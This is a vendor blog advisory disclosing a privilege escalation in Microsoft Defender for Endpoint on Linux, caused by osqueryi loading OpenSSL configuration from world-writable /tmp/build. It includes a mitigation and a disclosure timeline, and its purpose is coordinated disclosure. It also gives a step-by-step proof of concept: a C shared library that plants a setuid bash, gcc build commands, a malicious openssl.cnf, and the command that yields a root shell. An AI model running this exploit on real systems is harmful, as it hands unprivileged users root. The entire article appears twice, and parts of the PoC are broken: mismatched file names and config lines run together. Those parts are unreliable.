Stratascale’s Cybersecurity Research Unit (CRU) discovered a local privilege escalation flaw in Microsoft Defender for Endpoint on Linux (CVE-2025-47161). The Osquery component allowed unprivileged users to gain root access. Microsoft has issued a patch—learn more to stay protected.
Microsoft Defender for Endpoint (MDE) is a comprehensive enterprise endpoint security platform designed to help organizations prevent, detect, investigate, and respond to advanced threats. It safeguards a wide range of devices, including Windows and Mac client computers, Windows and Linux servers, as well as iOS and Android mobile devices. It provides various capabilities such as endpoint detection and response, threat protection, and posture management. Source: Microsoft Defender for Endpoint on Linux.
The Stratascale Cyber Research Unit (CRU) team discovered an elevation of privilege vulnerability in the Osquery component bundled with MDE. Osquery is a powerful open-source utility that “uses basic SQL commands to leverage a relational data model to describe a device.” MDE uses Osquery to query information about the system.
| MDE for Linux Versions | ||
|---|---|---|
| Status | Build | Release Version |
| Not Vulnerable | May-2025 Build: 101.25032.0008 | 30.125032.0008.0 |
| Remediated | April-2025 Build: 101.25022.0002 | 30.125022.0001.0 |
| Vulnerable | March-2025 Build: 101.25012.0000 | 30.125012.0000.0 |
| Vulnerable | Feb-2025 Build: 101.24122.0008 | 20.124112.0008.0 |
| Vulnerable | Feb-2025 Build: 101.24112.0003 | 30.124112.0003.0 |
| Vulnerable | Jan-2025 Build: 101.24112.0001 | 30.124112.0001.0 |
| Vulnerable | Jan-2025 Build: 101.24102.0000 | 30.124102.0000.0 |
| Not Vulnerable | Nov-2024 Build: 101.24092.0002 | 30.124092.0002.0 |
| Not Vulnerable | Oct-2024 Build: 101.24082.0004 | 30.124082.0004.0 |
If you are unable to upgrade, a simple workaround will prevent exploitation of this vulnerability. Ensure the /tmp/build directory exists, is owned by root, and is not writable by any other account.
mkdir -m 700 /tmp/build
# optionally set the immutable flag for ext* filesystems to prevent deletion
chattr +i /tmp/build
Note: The vulnerability was verified on Ubuntu 24.04.1 LTS and 24.04.2 LTS.
The MDE on Linux packages includes the osqueryi CLI. Osqueryi creates a uniform way to query details about the system using a SQL-like interface. For example, to query a subset of information for any processes named chronyd, the following simple query can be used on the command line.
The MDE daemon executes osqueryi approximately every 10 minutes to collect a subset of system information. This means a local unprivileged user could gain code execution as root within 10 minutes (the worst case).
What makes this elevation of privilege vulnerability particularly notable is that it does not stem from a coding defect, business logic error, or insecure configuration. Instead, the issue arises from the way the osqueryi binary is compiled against the OpenSSL dependencies. When an application is built and linked to OpenSSL libraries, there are predefined variables such as OPENSSLDIR that control where the OpenSSL functions will look for configurations and libraries.
Elevation of privilege issues can surface when a program is built with the OPENSSLDIR variable that points to a non-default location and is writable by unprivileged users. This issue has been commonly observed in environments that use CI/CD automation to cross-compile software. Cross-compilation allows one system (for example, a Linux server) to generate binaries for another (such as Windows), streamlining development by reducing the need for multiple target systems.
In this case, the bundled osqueryi binary was built with the OPENSSLDIR path set to /tmp/build. This value is hardcoded into the binary. To find the value, simply execute strings on the binary or linked library (normally libcrypto.so).
Because /tmp is word-writable by design, a local user can stage a malicious OpenSSL configuration file and shared object. When MDE executes osqueryi as root, it will load the arbitrary shared object file, resulting in code execution as root.
Create a file named mde-lpe.c with the following code.
Proof of concept code:
#include <stdlib.h>
#include <unistd.h>
void woot(){
system("/bin/cp /bin/bash /tmp/woot;/bin/chmod 4755 /tmp/woot");
}
Compile the C program to create a shared library using the following gcc commands.
gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
Execute the following mkdir command to create the OPENSSLDIR directory path.
mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
Create a file named openssl.cnf in the /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/ directory. This is the “malicious” OpenSSL configuration that will trick the osqueryi utility to load the /tmp/woot.so shared library every time it’s executed.
# Malicious openssl.cnf
openssl_conf = openssl_init[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot dynamic_path = /tmp/woot.so init = 0
Monitor for the existence of /tmp/woot for the next ~10 minutes. When the binary exists, execute /tmp/woot to get a root shell.
/tmp/woot -p
Putting it all together in a script yields a root shell within ten minutes. Note: No attempt was made to be stealthy for this PoC. MDE will flag and alert on this action.
To show the process hierarchy, the above shared object was modified to execute the ps command and store the output in a file. The below process list was extracted from /woot.txt and formatted to make it easier to read. This shows osqueryi running the ps command.
Note: If you want to manually test the vulnerability without waiting up to ten minutes, execute the following command as root.
/opt/microsoft/mdatp/sbin/osqueryi "select count() from processes"
Microsoft resolved this by changing the OPENSSLDIR build environment variable to a location that would not be writable by default on Linux systems.
2025-02-07 Vulnerability submitted to MSRC.
2025-02-10 MSRC opened a case for the issue.
2025-02-17 MSRC replied, unable to reproduce the issue with manual steps.
2025-02-17 Added information to the case.
2025-02-19 Sent a follow-up email.
2025-02-20 Added information to the case.
2025-02-20 MSRC was able to reproduce with the added information.
2025-03-03 MSRC officially confirms the issue. Status changed to Develop.
2025-04-08 Requested status update.
2025-04-16 MSRC replied – no change in status.
2025-04-22 Retested the April 07th 2025 release and found the issue was fixed.
2025-04-22 Notified MSRC the issue was fixed.
2025-05-09 MSRC confirms the fix was pushed out and will request a CVE.
2025-05-09 Requested MSRC to confirm disclosure date.
2025-05-15 Case automatically closed. Requested MSRC for an update on the CVE assignment.
2025-05-21 Requested update from MSRC.
2025-05-21 MSRC responded with CVE-2025-47161.
2025-05-21 Informed MSRC that CRU will publish a blog and asked if they wanted to review.
2025-05-22 Informed MSRC that a blog will be published on 5/27/25.
2025-05-22 MSRC requested draft blog for review.
2025-05-22 Sent MSRC draft blog.
2025-05-27 Coordinated Public Disclosure.
The CVE-2025-47161 MDE on Linux Elevation of Privilege vulnerability was discovered and reported to Microsoft by Rich Mirch of the Stratascale Cyber Research Unit.
Microsoft Defender for Endpoint (MDE) is a comprehensive enterprise endpoint security platform designed to help organizations prevent, detect, investigate, and respond to advanced threats. It safeguards a wide range of devices, including Windows and Mac client computers, Windows and Linux servers, as well as iOS and Android mobile devices. It provides various capabilities such as endpoint detection and response, threat protection, and posture management. Source: Microsoft Defender for Endpoint on Linux.
The Stratascale Cyber Research Unit (CRU) team discovered an elevation of privilege vulnerability in the Osquery component bundled with MDE. Osquery is a powerful open-source utility that “uses basic SQL commands to leverage a relational data model to describe a device.” MDE uses Osquery to query information about the system.
| MDE for Linux Versions | ||
|---|---|---|
| Status | Build | Release Version |
| Not Vulnerable | May-2025 Build: 101.25032.0008 | 30.125032.0008.0 |
| Remediated | April-2025 Build: 101.25022.0002 | 30.125022.0001.0 |
| Vulnerable | March-2025 Build: 101.25012.0000 | 30.125012.0000.0 |
| Vulnerable | Feb-2025 Build: 101.24122.0008 | 20.124112.0008.0 |
| Vulnerable | Feb-2025 Build: 101.24112.0003 | 30.124112.0003.0 |
| Vulnerable | Jan-2025 Build: 101.24112.0001 | 30.124112.0001.0 |
| Vulnerable | Jan-2025 Build: 101.24102.0000 | 30.124102.0000.0 |
| Not Vulnerable | Nov-2024 Build: 101.24092.0002 | 30.124092.0002.0 |
| Not Vulnerable | Oct-2024 Build: 101.24082.0004 | 30.124082.0004.0 |
If you are unable to upgrade, a simple workaround will prevent exploitation of this vulnerability. Ensure the /tmp/build directory exists, is owned by root, and is not writable by any other account.
mkdir -m 700 /tmp/build
# optionally set the immutable flag for ext* filesystems to prevent deletion
chattr +i /tmp/build
Note: The vulnerability was verified on Ubuntu 24.04.1 LTS and 24.04.2 LTS.
The MDE on Linux packages includes the osqueryi CLI. Osqueryi creates a uniform way to query details about the system using a SQL-like interface. For example, to query a subset of information for any processes named chronyd, the following simple query can be used on the command line.
The MDE daemon executes osqueryi approximately every 10 minutes to collect a subset of system information. This means a local unprivileged user could gain code execution as root within 10 minutes (the worst case).
What makes this elevation of privilege vulnerability particularly notable is that it does not stem from a coding defect, business logic error, or insecure configuration. Instead, the issue arises from the way the osqueryi binary is compiled against the OpenSSL dependencies. When an application is built and linked to OpenSSL libraries, there are predefined variables such as OPENSSLDIR that control where the OpenSSL functions will look for configurations and libraries.
Elevation of privilege issues can surface when a program is built with the OPENSSLDIR variable that points to a non-default location and is writable by unprivileged users. This issue has been commonly observed in environments that use CI/CD automation to cross-compile software. Cross-compilation allows one system (for example, a Linux server) to generate binaries for another (such as Windows), streamlining development by reducing the need for multiple target systems.
In this case, the bundled osqueryi binary was built with the OPENSSLDIR path set to /tmp/build. This value is hardcoded into the binary. To find the value, simply execute strings on the binary or linked library (normally libcrypto.so).
Because /tmp is word-writable by design, a local user can stage a malicious OpenSSL configuration file and shared object. When MDE executes osqueryi as root, it will load the arbitrary shared object file, resulting in code execution as root.
Create a file named mde-lpe.c with the following code.
Proof of concept code:
#include <stdlib.h>
#include <unistd.h>
void woot(){
system("/bin/cp /bin/bash /tmp/woot;/bin/chmod 4755 /tmp/woot");
}
Compile the C program to create a shared library using the following gcc commands.
gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
Execute the following mkdir command to create the OPENSSLDIR directory path.
mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
Create a file named openssl.cnf in the /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/ directory. This is the “malicious” OpenSSL configuration that will trick the osqueryi utility to load the /tmp/woot.so shared library every time it’s executed.
# Malicious openssl.cnf
openssl_conf = openssl_init[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot dynamic_path = /tmp/woot.so init = 0
Monitor for the existence of /tmp/woot for the next ~10 minutes. When the binary exists, execute /tmp/woot to get a root shell.
/tmp/woot -p
Putting it all together in a script yields a root shell within ten minutes. Note: No attempt was made to be stealthy for this PoC. MDE will flag and alert on this action.
To show the process hierarchy, the above shared object was modified to execute the ps command and store the output in a file. The below process list was extracted from /woot.txt and formatted to make it easier to read. This shows osqueryi running the ps command.
Note: If you want to manually test the vulnerability without waiting up to ten minutes, execute the following command as root.
/opt/microsoft/mdatp/sbin/osqueryi "select count() from processes"
Microsoft resolved this by changing the OPENSSLDIR build environment variable to a location that would not be writable by default on Linux systems.
2025-02-07 Vulnerability submitted to MSRC.
2025-02-10 MSRC opened a case for the issue.
2025-02-17 MSRC replied, unable to reproduce the issue with manual steps.
2025-02-17 Added information to the case.
2025-02-19 Sent a follow-up email.
2025-02-20 Added information to the case.
2025-02-20 MSRC was able to reproduce with the added information.
2025-03-03 MSRC officially confirms the issue. Status changed to Develop.
2025-04-08 Requested status update.
2025-04-16 MSRC replied – no change in status.
2025-04-22 Retested the April 07th 2025 release and found the issue was fixed.
2025-04-22 Notified MSRC the issue was fixed.
2025-05-09 MSRC confirms the fix was pushed out and will request a CVE.
2025-05-09 Requested MSRC to confirm disclosure date.
2025-05-15 Case automatically closed. Requested MSRC for an update on the CVE assignment.
2025-05-21 Requested update from MSRC.
2025-05-21 MSRC responded with CVE-2025-47161.
2025-05-21 Informed MSRC that CRU will publish a blog and asked if they wanted to review.
2025-05-22 Informed MSRC that a blog will be published on 5/27/25.
2025-05-22 MSRC requested draft blog for review.
2025-05-22 Sent MSRC draft blog.
2025-05-27 Coordinated Public Disclosure.
The CVE-2025-47161 MDE on Linux Elevation of Privilege vulnerability was discovered and reported to Microsoft by Rich Mirch of the Stratascale Cyber Research Unit.
Practical Guidance & Threat Intelligence
Stay a step ahead of the competition–and attackers–with fresh perspectives, practical guidance, and the latest threat intelligence.
To strengthen threat detection and accelerate compliance efforts, tool sprawl needs to be kept under control. Here are four steps to optimize your security tools and combat technology sprawl.
Learn how explainability, governance, and auditability in agentic AI systems help ensure safe, ethical, and accountable deployment while keeping innovation on track.
Our team shares key takeaways from Black Hat 2025, including why foundational security practices, AI governance, and insider threat management are more critical than ever for building resilience and aligning cybersecurity with business strategy.
As work becomes more distributed, securing access without slowing productivity is essential. Learn how modern access browsers deliver enterprise-grade protection with a seamless user experience.
As cyber threats evolve, guarding your organizational data becomes increasingly important. Discover tactical ways to build AI-era protection for sensitive information.
To strengthen threat detection and accelerate compliance efforts, tool sprawl needs to be kept under control. Here are four steps to optimize your security tools and combat technology sprawl.
